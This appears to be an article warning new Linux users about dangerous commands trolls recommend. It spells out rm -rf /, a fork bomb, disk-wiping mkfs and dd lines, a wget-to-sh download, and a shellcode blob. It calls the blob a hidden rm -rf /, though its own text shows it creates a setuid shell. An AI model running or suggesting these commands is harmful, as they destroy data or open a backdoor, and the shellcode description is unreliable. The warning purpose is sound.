Some Dangerous Commands You Should Never Run on Linux

Linux’s terminal commands are powerful, and Linux won’t ask you for confirmation if you run a command that won’t break your system. It’s not uncommon to see trolls online recommending new Linux users run these commands as a joke.

Learning the commands you shouldn’t run can help protect you from trolls while increasing your understanding of how Linux works. This isn’t an exhaustive guide, and the commands here can be remixed in a variety of ways.

Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.

rm -rf / – Deletes Everything!

The command rm -rf / deletes everything it possible can, including files on your hard drive and files on connected removable media devics. This command is more understandable if it’s broken down:

• rm – Remove the following files.
• -rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
• / – Tells rm to start at the root directory, which contains all the files on your computer.

Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.

The Lesson: Beware rm -rf.

Disguised rm –rf /

Here’s another snippet of code that’s all over the web:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

This is the hex version of rm –rf / – executing this command would wipe out your files just as if you had run rm –rf /.

The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.

:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

:(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

mkfs.ext4 /dev/sda1 – Formats a Hard Drive

The mkfs.ext4 /dev/sda1 command is simple to understand:

• mkfs.ext4 – Create a new ext4 file system on the following device.
• /dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.

command > /dev/sda – Writes Directly to a Hard Drive

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

• command – Run a command (can be any command.)
• > – Send the output of the command to the following location.
• /dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.

dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

• dd – Perform low-level copying from one location to another.
• if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
• of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

mv ~ /dev/null – Moves Your Home Directory to a Black Hole

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.

• mv – Move the following file or directory to another location.
• ~ – Represents your entire home folder.
• /dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.

The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.

wget http://example.com/something -O – | sh – Downloads and Runs a Script

The above line downloads a script from the web and sends it to sh,which executes the contents of the script. This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.

• wget – Downloads a file. (You may also see curl in place of wget.)
• http://example.com/something – Download the file from this location.
• | – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
• sh – Send the file to the sh command, which executes it if it’s a bash script.

The Lesson: Don’t download and run untrusted scripts from the web, even with a command.